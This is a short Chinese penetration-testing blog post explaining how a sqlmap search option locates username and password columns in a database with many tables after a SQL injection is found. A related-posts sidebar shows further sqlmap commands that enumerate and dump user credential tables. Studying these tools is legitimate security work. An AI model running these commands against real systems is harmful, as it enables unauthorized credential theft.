数据表很多,sqlmap快速找出存放用户名和密码的表,一把梭

最新推荐文章于 2024-05-22 10:15:00 发布
最新推荐文章于 2024-05-22 10:15:00 发布
阅读量3.7k 收藏 3
点赞数
分类专栏: 渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42253265/article/details/112465258
版权

这两天打战,突然发现了有个巨多无比数据库的sql注入漏洞,漏洞是找到了,可怎么去翻找用户名和密码存放在哪个表了?

在这里插入图片描述

其中一个少的数据库就已经有35个表格存在了,假设在命名没有规律的情况下如何查找呢。

可以输入sqlmap的这条语句

-D 数据库–-search -C username,password

在这里插入图片描述
可以看到,sqlmap把匹配到的内容全部都爬了出来,后续不要点爆破就可以了

本博客仅用于学习交流,请各位同学自行在靶场或授权站点进行测试。

冰羽呐
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlserver用户名密码存储在哪_【涨知识】弱密码需要知道的NIST十三条密码准则...
weixin_40001442的博客
12-08 2245
Centrify最近的一项调查显示,受访的1000名IT决策者中,74%的入侵事件涉及特权账户访问。而今年RSAC2020的现场调查数据显示:>> 接近四分之一的受访者(23%)使用相同的工作和个人账户密码,违反了行业最佳实践>> 超过五分之一的受访者(21%)仍将密码存储在手机、计算机或打印文档中,同样违反了行业最佳实践注意,以上调查是针对安全行业人士进行,普通...
通过SQLmap爬数据库获取虚拟机架站的用户名密码
07-13
通过SQLmap爬数据库获取虚拟机架站的用户名密码
sqlmap注入后,获取到的数据库、很多,如何快速找到账号和密码的位置
看不尽的尘埃——博客
02-07 7313
-D 数据库–-search -C admin,password  
SQL注入之sqlmap入门教程_sqlmap注入
最新发布
m0_61869253的博客
05-22 692
原来sql注入如此简单以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。
使用OQL+SQLMAP解决ORM多复杂的查询问题
weixin_34006965的博客
02-25 107
    一般情况下,使用ORM框架来完成单个实体的查询是很方便的,但如果有复杂的查询条件,普通的ORM组件比较困难,PDF.NET数据开发框架的ORM实体类查询语言--OQL,使得构造复杂的查询条件成为可能,参加我的其它相关文章。       很多ORM框架都只能处理单个实体的查询,但如果要连查询就比较困难了,主要问题是连查询的结果无法投射到一个实体类中,这时候只有动态创建一个类来处理,比...
centos下mysql创建--存放用户名密码
h593245631的博客
06-30 5754
1.进入数据库 mysql -u root -p 2.创建数据库 CREATE DATABASE `db` CHARACTER SET 'utf8' COLLATE 'utf8_general_ci'; USE DB; 3.创建 CREATE TABLE `user` ( `username` varchar(20) NOT NULL PRIMARY KEY, `password` ...
sql 三查询不同用户的名字
qq_44809819的博客
02-11 648
SELECT r.report_id, r.report_user, u1.user_name AS reporter, r.post_id, p.user_id, u2.user_name AS author, post_img, post_titile, report_time, r.report_reason FROM report r JOIN post p ON r.post_id= p.post_id JOIN user_info u1 ON r.report_us.
Sqlmap获取用户名与服务器.docx
04-14
通过 Sqlmap,我们可以轻松地检测数据库系统的漏洞,从而获取数据库用户名密码Sqlmap 工具的使用非常广泛,特别是在渗透测试和安全测试领域。 Sqlmap 的主要功能是检测数据库系统的漏洞,包括 SQL 注入漏洞、...
第一节 Sqlmap介绍-01
09-15
它有一个强大的检测引擎,许多适合于终极渗透测试的小众特性和广泛的开关,从数据库指纹、从数据库获取数据到访问底层文件系统和通过带外连接在操作系统上执行命令。 Sqlmap 的主要功能包括: 1.自动化检测 SQL ...
图集:快速SQLMap篡改建议程序
01-30
Atlas-快速SQLMap篡改建议v1.0 Atlas是一个开放源代码工具,可以建议sqlmap篡改绕过WAF / IDS / IPS,该工具基于返回的状态代码。 屏幕 安装 $ git clone https://github.com/m4ll0k/Atlas.git atlas $ cd atlas $ ...
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
SQL Server口令密码对照
02-10
最全的SQL server口令集 对攻击网站的朋友起到了尤其重要的作用。通用语SQL
找出存放用户名密码
caiguazheng4921的博客
11-23 228
作者:王岗msn:[email]beijinghuanyingnin2008@hotmail.com[/email]欢迎转载,转载请指明文章出自[url]www.51cto.com[/url]也欢迎大家访问我的网站:[url]www.itheroes.cn[/url] 前不久在《网管员世界》论坛上看到一位网友发了一个帖子,内容大体是该网友单位运行着一套管理软件,该软件...
sqlmap,扫描网站数据库并得到用户名密码
专注前端技术,包括Web端、移动端、小程序、APP
02-04 9839
接着上篇文章,你已经对sqlmap有了了解。那么我们今天就进一步了解sqlmap,使用sqlmap对一个网站解剖分析! SqlMap的程序允许检查网站的SQL注入漏洞,XSS漏洞的存在,并且可以还利用SQL注入。支持多种SQL注入类型和多种数据库。 我们可以使用sqlmap检查网站中是否存在漏洞。 如果该站点容易受到SQL注入的攻击,则骇客可以进行以下攻击: 从数据库接收信息,包括转储(整个)数...
SQLserver 存于哪一个库,哪个
qq_42278201的博客
12-05 557
SQL 的所有系统信息都记录在Master数据库中。 SQL Server 2005有4个系统数据库,它们分别为Master、Model、Msdb、Tempdb。 model 数据库用作在 SQL Server 实例上创建的所有数据库的模板(比如你利用模板创建一张、一个存储过程、函数等等,这些模板都是在Model数据库中存储的)Msdb数据库是代理服务数据库,你设置的一些报警、任务调度、计划...
如何在Kali Linux下使用sqlmap攻击服务器数据库的内容 获取用户名密码 登陆它的服务器
追风筝的孩子
08-01 2万+
        题外话:这里添加一个通过域名获取IP的命令                   Sqlmap是一款开源的命令行自动SQL注入工具。它能够对多种主流数据库进行扫描支持,基于Python环境。它主要用于自动化地侦测和实施SQL注入攻击以及渗透数据库服务器。SQLMAP配有强大的侦测引擎,适用于高级渗透测试用户,不仅可以获得不同数据库的指纹信息,还可以从数据库中提取数据,此外还能够处...
mysql5.7 空间查询,MySQL5.7查看、修改password问题
weixin_39772420的博客
03-17 110
mysql的密码忘了,修改了很久,最后发现mysql5.7的password改为了authentication_string。又一次连接不上mysql了,这次查看修改密码步骤总结了一下,下次不能再因为这个浪费时间了。 1.打开mysql安装路径mysql.exe的所在目录 下: a.WIN+R: cmd,进入该目录下b. 关闭mysql服务(win+r :services.msc),然后输入mys...
sqlmap-----整理
bylfsj的博客
09-20 2187
SQLMAP注入教程-11种常见SQLMAP使用方法详解 </h1> <div class="clear"></div> <div class="postBody"> sqlmap也是渗透中常用的一个注...
sqlmap 详细用法
热门推荐
bill的专栏
06-07 2万+
sqlmap 详细用法 来源:本站转载 作者:佚名 时间:2013-06-05 21:47:15  1. 基础用法: ./sqlmap.py -u “注入地址” -v 1 –dbs   // 列举数据库 ./sqlmap.py -u “注入地址” -v 1 –current-db   // 当前数据库 ./sqlmap.py -u “注入地址” -v 1 –users
如何使用kali的sqlmap进行sql注入,获得第一个用户名密码哈希值
03-29
以下是使用kali的sqlmap进行sql注入,获得第一个用户名密码哈希值的步骤: 1. 打开终端并登录到kali系统。 2. 打开sqlmap,输入以下命令: ``` sqlmap -u "http://example.com/login.php?id=1" --dbs ``` 这个命令将告诉sqlmap要测试的URL和要检查的数据库。 3. 如果sqlmap成功找到数据库,则会列出数据库名称。选择要测试的数据库,例如: ``` sqlmap -u "http://example.com/login.php?id=1" -D dbname --tables ``` 这个命令将列出数据库中的所有。 4. 选择要测试的,例如: ``` sqlmap -u "http://example.com/login.php?id=1" -D dbname -T users --columns ``` 这个命令将列出中的所有列。 5. 选择要测试的列,例如: ``` sqlmap -u "http://example.com/login.php?id=1" -D dbname -T users -C username,password --dump ``` 这个命令将列出中的用户名密码哈希值。 6. sqlmap将显示第一个用户名密码哈希值。 这是一个基本的sqlmap命令,可以根据需要进行调整和修改。请注意,使用sqlmap进行sql注入是非法的,除非您有适当的授权和许可。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值